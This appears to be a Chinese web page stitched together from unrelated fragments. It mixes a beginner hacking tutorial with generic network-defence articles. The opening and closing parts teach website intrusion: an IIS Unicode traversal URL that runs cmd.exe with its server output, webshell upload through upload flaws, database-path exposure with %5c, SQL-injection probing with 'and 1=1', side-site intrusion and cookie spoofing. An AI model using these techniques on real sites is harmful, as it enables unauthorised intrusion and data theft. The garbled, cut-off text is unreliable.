黑客新人必学的网站入侵基本知识
【电子书必备】网络黑客入门教程
我们以目录里有index.asp做例子。
我们先要做的是把文件的只读属性解除掉,很多管理员都把文件设置只读。
我们用命令:
我们在浏览器里输入:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回车
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
-----------------
哈,我们看到了机器设置内容了,我们找找,主要看PATH_TRANSLATED=c:\inetpub\wwwroot
意思是他的主页存放在c:\inetpub\wwwroot的目录里,知道就好办了。
我们用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回车
2002-01-23 06:21p <DIR> WINNT
4 File(s) 1,156 bytes
5 Dir(s) 2,461,421,568 bytes free
------------------------------
的目录列表。也会碰到看不到文件的空目录。
进阶网络安全了解黑客攻击的防御技术
进阶网络安全了解黑客攻击的防御技术进阶网络安全:了解黑客攻击的防御技术网络安全已成为当今信息社会中的重要议题。
随着科技的进步,黑客攻击也随之不断演变和增强。
对于企业和个人来说,了解黑客攻击的防御技术至关重要。
本文将介绍一些进阶的网络安全知识,帮助读者更好地了解黑客攻击并掌握有效的防御技术。
一、了解黑客攻击的类型1. 木马攻击:黑客通过植入木马病毒来控制受害者的计算机系统。
2. 网络钓鱼:黑客使用虚假的网站或电子邮件来诱使用户透露个人账号和密码等机密信息。
3. DDoS攻击:黑客通过向目标网站发送大量伪造的请求,使其服务器过载从而导致瘫痪。
4. SQL注入:黑客通过在网站表单等输入框中插入恶意代码,从而获取数据库中的敏感信息。
5. 社交工程:黑客利用人们的社交行为,通过欺骗、冒充身份等手段获取机密信息。
二、黑客攻击的防御技术1. 加强密码安全:使用复杂、随机的密码,并定期更换密码。
同时,使用多因素认证可以提高账户的安全性。
2. 及时修补漏洞:保持系统和应用程序的及时更新,安装最新的安全补丁以防止黑客利用已知漏洞进行攻击。
3. 密切监控网络流量:使用网络安全工具进行实时监测和分析网络流量,及时发现和应对来自黑客的攻击。
4. 防火墙设置:配置网络防火墙来过滤和阻止未经授权的访问请求,以减少黑客攻击的入侵风险。
5. 数据加密:对敏感数据进行加密可以防止黑客在获取数据后进行利用。
6. 建立备份和灾难恢复计划:定期备份数据,并建立完善的灾难恢复计划,以便在黑客攻击或数据泄露事件发生时能够迅速恢复业务。
7. 增强员工的网络安全意识:开展网络安全培训,教育员工识别和避免潜在的网络攻击手段,提高整体网络安全水平。
三、未来的网络安全挑战随着技术的不断进步和黑客攻击手段的不断演变,网络安全仍然面临着许多挑战。
其中一些挑战包括人工智能的滥用、物联网的脆弱性和对新型黑客攻击技术的不断适应等。
为了更好地保护网络安全,我们需要持续关注并投入研发和创新,提升网络安全技术和防御手段的水平。
反网络入侵知识点
反网络入侵知识点
网络入侵是指不经授权而侵犯他人计算机系统、网络或数据的行为。
以下是一些反网络入侵的知识点:
1. 强密码:使用强密码是防止网络入侵的第一步。
一个强密码应包含大小写字母、数字和特殊字符,并且应具有足够的长度。
2. 多因素身份验证:使用多因素身份验证可以增加账户的安全性。
除了密码,使用其他因素如指纹识别、短信验证码或安全令牌等进行身份验证。
3. 更新防病毒软件:定期更新防病毒软件可以帮助防止恶意软件的入侵。
确保病毒库和软件本身都是最新的可以提供最有效的保护。
5. 定期备份数据:定期备份数据可以帮助防止数据丢失和勒索软件的攻击。
确保备份存储在安全的地方,并进行恢复测试以确保数据可靠性。
6. 使用安全的Wi-Fi网络:尽量避免使用公共Wi-Fi网络,因为它们可能存在安全风险。
如果需要使用公共Wi-Fi,确保使用VPN等安全措施来保护数据传输的安全性。
7. 定期检查账户活动:定期检查个人和机构账户的活动情况,如登录记录和交易历史等。
如发现异常活动,应立即采取必要的措施,如更改密码或报告机构。
8. 防火墙配置:使用防火墙可以帮助监控和控制网络流量,阻止未经授权的访问和入侵。
确保防火墙已正确配置并定期升级。
以上是一些反网络入侵的知识点,它们可以帮助保护个人和机构的网络安全。
请根据自己的实际情况采取适当的措施,确保网络的安全性和稳定性。
网络攻击与防护基础知识
网络攻击与防护基础知识第一章背景与介绍在当今数字化时代,互联网已经成为了人们生活中不可或缺的一部分。
随着网络的快速发展,网络攻击也越来越频繁且严重。
网络攻击是指利用网络系统中的漏洞或弱点,通过未经授权的方式对系统进行非法访问、破坏或盗取信息的行为。
本章将简要介绍网络攻击的背景和概念。
第二章常见的网络攻击类型网络攻击有多种类型,每一种都有不同的特征和对应的防护措施。
本章将详细介绍以下几种常见的网络攻击类型:1. 木马病毒:木马病毒是一种潜伏在计算机系统中的恶意软件,通过隐藏于正常程序中的方式,获取用户的敏感信息或对系统进行远程控制。
2. 电子邮件钓鱼:邮件钓鱼是指攻击者通过冒充合法的邮件发送方,诱骗用户提供个人信息或操纵用户点击恶意链接,进而获取用户的敏感信息。
3. DDoS 攻击:分布式拒绝服务攻击(DDoS)是指攻击者通过将多个计算机联合起来进行攻击,向目标服务器发送大量恶意流量,耗尽服务器资源导致服务不可用。
4. SQL 注入攻击:SQL 注入攻击是指黑客向网站的数据库中注入恶意 SQL 代码,以获取敏感的数据库信息或控制数据库。
第三章网络攻击的危害网络攻击对个人、企业乃至整个网络的安全带来了巨大的威胁。
本章将详细阐述网络攻击的危害,包括但不限于以下几个方面:1. 数据泄露:网络攻击可能导致用户的个人信息、信用卡信息等敏感数据被窃取,造成严重的隐私泄漏和财务损失。
2. 服务不可用:DDoS 攻击可能导致网络服务不可用,企业的在线业务受到严重影响,造成巨大的经济损失。
3. 社会不稳定:网络攻击还可能导致政府、金融系统等关键国家机构遭受损害,对社会稳定产生巨大影响。
第四章网络防护的基本原则为了应对不断增多的网络攻击,网络防护成为了当务之急。
本章将介绍网络防护的基本原则,以帮助个人和企业制定合理的防护策略:1. 多层次防护:网络防护需要在网络系统的多个层次进行,包括网络层、主机层和应用层。
通过适当的防护措施,能够形成多重安全防线。
信息安全网络攻击与防护知识点汇总
信息安全网络攻击与防护知识点汇总在当今数字化的时代,信息安全成为了至关重要的问题。
网络攻击手段日益多样化和复杂化,给个人、企业乃至国家带来了巨大的威胁。
了解网络攻击的常见方式以及相应的防护措施,对于保护我们的信息资产和网络环境的安全具有重要意义。
一、常见的网络攻击类型1、恶意软件攻击恶意软件是指可以在用户计算机或网络中执行恶意操作的软件。
常见的恶意软件包括病毒、蠕虫、特洛伊木马、间谍软件和广告软件等。
病毒通过自我复制和传播来感染计算机系统,破坏文件或数据。
蠕虫则能够自主传播,无需宿主文件,可迅速在网络中扩散。
特洛伊木马看似合法的程序,实则隐藏着恶意功能,如窃取用户信息。
间谍软件通常用于监控用户的活动和收集敏感数据。
广告软件则会频繁弹出广告,影响用户体验,甚至可能存在安全风险。
2、网络钓鱼攻击网络钓鱼是一种通过欺骗用户获取个人敏感信息(如用户名、密码、信用卡信息等)的攻击方式。
攻击者通常会伪装成合法的机构或个人,通过电子邮件、短信或虚假网站来诱导用户提供敏感信息。
3、 DDoS 攻击(分布式拒绝服务攻击)DDoS 攻击通过向目标服务器或网络发送大量的请求,使其无法正常处理合法用户的请求,从而导致服务中断。
这种攻击通常利用大量被控制的计算机(僵尸网络)来发动,形成巨大的流量洪流。
4、 SQL 注入攻击SQL 注入是针对数据库驱动的网站或应用程序的一种攻击方式。
攻击者通过在输入字段中插入恶意的 SQL 代码,从而获取、修改或删除数据库中的数据。
5、零日攻击零日攻击利用尚未被发现或未被修复的软件漏洞进行攻击。
由于安全补丁尚未发布,使得防御此类攻击变得非常困难。
二、网络攻击的途径和手段1、社交工程攻击者利用人类的心理弱点,如好奇心、信任和恐惧,通过欺骗手段获取用户的信息或权限。
例如,冒充同事或上级请求提供密码等。
2、无线网络攻击针对无线网络的攻击包括破解 WiFi 密码、中间人攻击等。
在公共无线网络中,用户的通信数据容易被窃取。
学黑客需要学的知识点
学黑客需要学的知识点黑客一词源于英文hacker,最初被用于形容计算机领域具有卓越技能的人。
但随着时间的推移,黑客的定义变得更加复杂,涵盖了更广泛的领域。
学习黑客需要掌握一系列技能和知识点,下面将逐步介绍。
1.基础计算机知识黑客需要对计算机的基本原理和操作有深入的了解。
这包括计算机硬件、操作系统、网络协议等。
掌握这些知识将帮助你更好地理解计算机系统的工作原理,为后续的学习和实践奠定基础。
2.编程语言学习编程语言是成为一名优秀黑客的关键。
掌握一门或多门编程语言,如Python、C++、Java等,将使你能够编写自己的软件程序,并更好地理解其他人编写的代码。
编程能力是黑客攻击和防御中的重要一环。
3.网络安全知识网络安全是黑客学习的核心内容。
学习网络安全知识将使你能够理解不同类型的攻击和防御技术。
了解常见的网络漏洞、攻击技术和防御机制,如SQL注入、跨站脚本、DDoS攻击等,将有助于你成为一名有竞争力的黑客。
4.操作系统安全了解不同操作系统的安全机制和弱点是学习黑客的关键一步。
掌握Linux系统的命令行操作和常用工具,了解Windows系统的漏洞和防御措施,将使你能够更好地利用系统漏洞或加强系统安全。
5.数据库知识数据库是现代应用中常见的数据存储方式。
了解数据库的原理、结构和安全性将有助于你在黑客攻击和数据泄露方面有更多的了解和技巧。
学习SQL语言和一些主流数据库系统,如MySQL、Oracle等,将使你能够更好地操作和保护数据。
6.密码学密码学是黑客学习中的重要领域。
了解对称加密和非对称加密的原理、常见的加密算法和破解方法,将使你能够更好地理解密码学的基本概念和应用,为密码破解和保护提供基础。
7.社会工程学社会工程学是黑客攻击中的重要手段。
学习社会工程学将使你能够更好地了解人类心理和行为,并利用这些知识进行社交工程攻击。
这包括欺骗、钓鱼等手段,通过社交工程获取目标的敏感信息。
8.漏洞研究和利用学习漏洞研究和利用将使你能够发现和利用软件和系统中的漏洞。
入侵常识
首先你得有个ASP木马,最好是免杀的。要不一传上去就直接给查杀了。
然后用工具 明小子 或阿D 等注入工具。找一下他的上传漏洞,或者找注入点,并破解他的后台管理员和密码。最后登录上去传你的ASP木马。
当你上传成功ASP木马后,然后用网页浏览你的ASP木马路径,如果显示你的马,那就说明你成功拿到他的WEBSHELL了。也就是可以通过ASP木马完全可以浏览他的磁盘文件了(包括他的主页文件)。
address:XXX.XXX.XXX.XXX
然后输入server 显示出来的IP就总 服务器的地址了。
第2种:确定对方的系统,和服务版本。ping一般都不管用了,很少有傻B管理员连放火墙都不装的。首先看看对方有无开21和23 ,开了23就在cmd下输入
其实,在英文原意里,“Hacker(黑客)”最初的意思是指一类计算机高手,这类人有喜欢研究系统漏洞的嗜好,他们并不入侵别人系统;而真正入侵别人系统的人被叫作“Cracker(怪客)”。
其实会入侵网站的“黑客”没什么了不起,真正厉害的是背后那些找出系统漏洞的“黑客”。这就好像会利用游戏密技破关的人其实并不怎么厉害,真正从无到有,找出游戏隐藏秘密的人才叫高手。可是对于从未接触过游戏的人来说,他其实分不出“使用密技”与“找出密技”的差别,他只要看到有人会破关就觉得很厉害,而这也是大多数不了解“黑客”与“怪客”差异的人,就会认为他们两者都是高手。这些所谓能入侵的黑客,真的没你想像中这么“神奇”,别被电影的情节给骗了!不过,既然大家早已“黑、怪”不分,那我们就把他们都叫作黑客吧!
从上面可以看出我给192.168.1.1发50个数据包。返回了48个,其中有两个丢失,返回速度最快为40ms,最慢为51ms,平均速度为46ms.TTL为128是NT系统。
网络安全入门了解网络黑客攻击
网络安全入门了解网络黑客攻击网络安全入门:了解网络黑客攻击随着互联网的普及和发展,网络安全问题日益凸显。
黑客攻击作为其中的重要一环,对个人和组织的信息安全造成了严重威胁。
本文将带你入门了解网络黑客攻击,从攻击类型、攻击手段以及防御措施等方面进行探讨。
一、攻击类型1.1 黑客攻击的分类黑客攻击可分为主动攻击和被动攻击两种类型。
主动攻击指黑客对目标发起直接攻击,例如入侵系统、窃取敏感信息等;而被动攻击则是利用网络漏洞或弱点,暗中收集目标信息,不直接与目标进行交互。
1.2 常见黑客攻击类型(1)网络钓鱼攻击(Phishing)网络钓鱼攻击是指黑客通过仿冒合法网站或发送虚假电子邮件等方式,诱导用户泄露个人敏感信息,如账号、密码、银行卡号等。
(2)拒绝服务攻击(DoS/DDoS)拒绝服务攻击是指黑客通过大量虚假请求,使目标系统或网络服务不堪重负而崩溃,导致用户无法正常访问。
(3)恶意软件攻击(Malware)恶意软件包括病毒、蠕虫、木马等,黑客通过植入恶意软件,可以窃取用户信息、控制计算机,并对系统进行破坏。
(4)入侵攻击(Intrusion)黑客通过寻找系统漏洞,利用弱点入侵系统,获取管理员权限或篡改、窃取数据。
二、攻击手段2.1 攻击前期准备黑客在进行攻击之前,通常会进行侦察和收集目标信息。
他们可能会利用信息收集工具,如网络扫描器、端口扫描器等,来识别目标系统的弱点和漏洞。
2.2 社交工程黑客通过社交工程技巧,利用人性的弱点进行攻击。
他们可能通过伪装身份、诱骗用户点击恶意链接或下载恶意文件等方式,获取用户的账号密码或操控用户设备。
2.3 利用漏洞攻击黑客经常寻找目标系统中的漏洞或弱点,利用这些漏洞进行攻击。
他们可以通过代码注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等方式获取系统控制权或窃取敏感信息。
三、防御措施3.1 加强网络安全意识用户应加强网络安全意识,警惕各类网络诈骗手段,不轻信陌生人的邮件、短信和链接,保护个人隐私。
电脑网络安全防范黑客入侵的基础知识
电脑网络安全防范黑客入侵的基础知识在当今数字化的时代,电脑网络已成为人们生活、工作和社交的重要组成部分。
然而,网络对安全的依赖也使得黑客入侵成为了一种威胁。
为了保护自己和组织的网络安全,了解电脑网络安全防范黑客入侵的基础知识是至关重要的。
一、密码安全密码是电脑网络安全的第一道防线。
一个强大的密码可以大大提高黑客入侵的难度。
在设置密码时,应尽量遵循以下原则:1. 长度:密码长度至少应为8个字符,并包括大小写字母、数字和特殊符号的组合。
更长的密码更安全。
2. 复杂性:密码应该是难以猜测的,避免使用与个人信息相关的常见词汇或日期。
3. 定期更换:密码不应长期不变,应定期更换,推荐每隔三个月更换一次。
4. 不重复:不要在多个账户或平台上使用相同的密码,以免一旦一个账户被攻破,其他账户也会有风险。
二、防火墙防火墙是一种网络安全设备,可监控和控制进出网络的流量。
它可以识别并拦截网络上的恶意流量,以防止黑客入侵。
防火墙的配置应该注意以下几点:1. 入站和出站规则:设置适当的入站和出站规则,只允许经过身份验证的用户进入网络,并限制对外部网络的访问。
2. 更新和维护:保持防火墙设备的软件和固件更新,以获得最新的安全性补丁和功能。
3. 监控和日志记录:监控防火墙的日志,及时发现和应对潜在的安全威胁。
合理保存日志记录,以便事后调查和审计。
三、反病毒软件反病毒软件或杀毒软件是保护电脑网络免受病毒、恶意软件和间谍软件等威胁的重要工具。
使用反病毒软件时,应考虑以下几个方面:1. 实时监测:确保反病毒软件能够实时监测系统和文件的变化,并及时发现潜在的威胁。
2. 自动更新:保持反病毒软件的病毒库文件和引擎的自动更新,以便及时识别和清除最新的病毒。
3. 定期扫描:定期全面扫描计算机,以检测和清除潜在的威胁。
四、网络安全培训不管是个人用户还是企业组织,都应该进行网络安全培训。
培训内容可以包括以下几个方面:1. 识别威胁:学会识别常见的网络威胁,包括钓鱼邮件、恶意链接和文件、社交工程等。
网络安全必读了解网络入侵
网络安全必读了解网络入侵随着互联网的快速发展,网络安全已成为一个备受关注的话题。
网络入侵是网络安全中比较常见的问题之一,若我们不了解网络入侵的相关知识,将会给我们的网络安全带来很大的风险。
那么,如何了解网络入侵呢?本文将为您详细介绍网络入侵相关知识,让您了解网络入侵的危害、防范措施及应对方法,让您的网络安全更可靠。
一、了解网络入侵网络入侵是指黑客或其他不法分子通过漏洞、弱口令等方式,未得到授权的情况下访问计算机系统、网络设备或数据的行为。
网络入侵可能导致一些不可逆转的后果,如窃取用户重要信息、破坏数据、勒索财务等。
二、危害网络入侵所造成的危害是非常严重的,例如:1.窃取重要信息:不法分子可以通过网络入侵窃取您的个人信息、商业机密等重要信息,给您带来重大损失。
2.破坏数据:网络入侵者可以更改、破坏您的数据,给您带来不可逆转的损失。
3.勒索财务:网络入侵者可以通过勒索威胁您,从而获得不当财利。
三、防范措施为了防范网络入侵,我们需要采取一些必要的防范措施,如下:1.设置强密码:设置强密码是防范网络入侵的一种重要措施。
密码必须含有字母、数字、特殊符号,在长度上要求至少是8位数。
2.更新系统和软件:系统和软件更新补丁以修复可能的漏洞并加强系统的安全。
3.关闭不必要的网络端口:只打开必须的网络端口以减少网络入侵的可能性。
4.使用安全软件:安全软件可以提前发现潜在的网络入侵,以及堵塞入侵的威胁。
四、应对方法即使采取了防范措施,仍然有可能出现网络入侵的情况。
在面对网络入侵时,我们需要尽快采取以下措施:1.断开网络连接:一旦发现网络入侵,第一时间需要断开网络连接。
2.改变密码:发现网络入侵后及时更改密码,以减少黑客的可能入侵。
3.备份数据:定期备份数据以便在系统遭到破坏时,快速恢复数据状态。
五、总结网络入侵是网络安全中的一个重要问题,对我们的生活和工作带来了重大的风险。
为了保障网络安全,我们需要了解网络入侵的相关知识。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
黑客新人必学的网站入侵基本知识
2007-07-08 08:05
1 上传漏洞,这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。
怎样利用:在网站的地址栏中网址后加上/upfile.asp如果显示上传格式不正确[重新上传] 这样的字样8成就是有长传漏洞了找个可以上传的工具直接可以得到WEBSHELL。
工具介绍:上传工具,老兵的上传工具、DOMAIN3.5,这两个软件都可以达到上传的目的,用NC也可以提交。
WEBSHELL是什么:WEBSHELL在上节课简单的介绍了下,许多人都不理解,这里就详细讲下,其实WEBSHELL并不什么深奥的东西,是个 WEB的权限,可以管理WEB,修改主页内容等权限,但是并没有什么特别高的权限,(这个看管理员的设置了)一般修改别人主页大多都需要这个权限,接触过 WEB木马的朋友可能知道(比如老兵的站长助手就是WEB木马
海阳2006也是 WEB木马)我们上传漏洞最终传的就是这个东西,有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。
2 暴库:这个漏洞现在很少见了,但是还有许多站点有这个漏洞可以利用,暴库就是提交字符得到数据库文件,得到了数据库文件我们就直接有了站点的前台或者后台的权限了。
暴库方法:比如一个站的地址为
/dispbbs.asp?boardID=7&ID=161,我门就可以把com/dispbbs中间的 /换成%5c,如果有漏洞直接得到数据库的绝对路径,用寻雷什么的下载下来就可以了。
还有种方法就是利用默认的数据库路径http: ///后面加上conn.asp。
如果没有修改默认的数据库路径也可以得到数据库的路径(注意:这里的/也要换成%5c)。
为什么换成%5c:因为在ASCII码里/等于%5c,有时碰到数据库名字为/#abc.mdb的为什么下不了? 这里需要把#号换成%23就可以下载了,为什么我暴出的数据库文件是以。
ASP结尾的?我该怎么办?这里可以在下载时把.ASP换成.MDB 这样就可以下载了如果还下载不了可能作了防下载。
3 注入漏洞:这个漏洞是现在应用最广泛,杀伤力也很大的漏洞,可以说微软的官方网站也存在着注入漏洞。
注入漏洞是因为字符过滤不严禁所造成的,可以得到管理员的帐号密码等相关资料。
怎样利用:我先介绍下怎样找漏洞比如这个网址
/dispbbs.asp?boardID=7&ID=161 后面是以ID=数字形式结尾的站我们可以手动在后面加上个 and 1=1 看看如果显示正常页面再加上个and 1=2 来看看如果返回正常页面说明没有漏洞如果返回错误页面说明存在注入漏洞。
如果加and 1=1 返回错误页面说明
也没有漏洞,知道了站点有没有漏洞我门就可以利用了可以手工来猜解也可以用工具现在工具比较多(NBSI NDSI 啊D DOMAIN等)都可以用来猜解帐号密码,因为是菜鸟接触,我还是建议大家用工具,手工比较烦琐。
4 旁注:我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。
打个形象的比喻,比如你和我一个楼,我家很安全,而你家呢,却漏洞百出,现在有个贼想入侵我家,他对我家做了监视(也就是扫描)发现没有什么可以利用的东西,那么这个贼发现你家和我家一个楼,你家很容易就进去了,他可以先进入你家,然后通过你家得到整个楼的钥匙(系统权限),这样就自然得到我的钥匙了,就可以进入我的家(网站)。
工具介绍:还是名小子的DOMIAN3.5不错的东西,可以检测注入,可以旁注,还可以上传!
5 COOKIE诈骗:许多人不知道什么是COOKIE,COOKIE是你上网时由网站所为你发送的值记录了你的一些资料,比如IP,姓名什么的。
怎样诈骗呢?如果我们现在已经知道了XX站管理员的站号和MD5密码了,但是破解不出来密码(MD5是加密后的一个16位的密码)我们就可以用 COOKIE诈骗来实现,把自己的ID修改成管理员的,MD5密码也修改
成他的,有工具可以修改COOKIE 这样就答到了COOKIE诈骗的目的,系统以为你就是管理员了。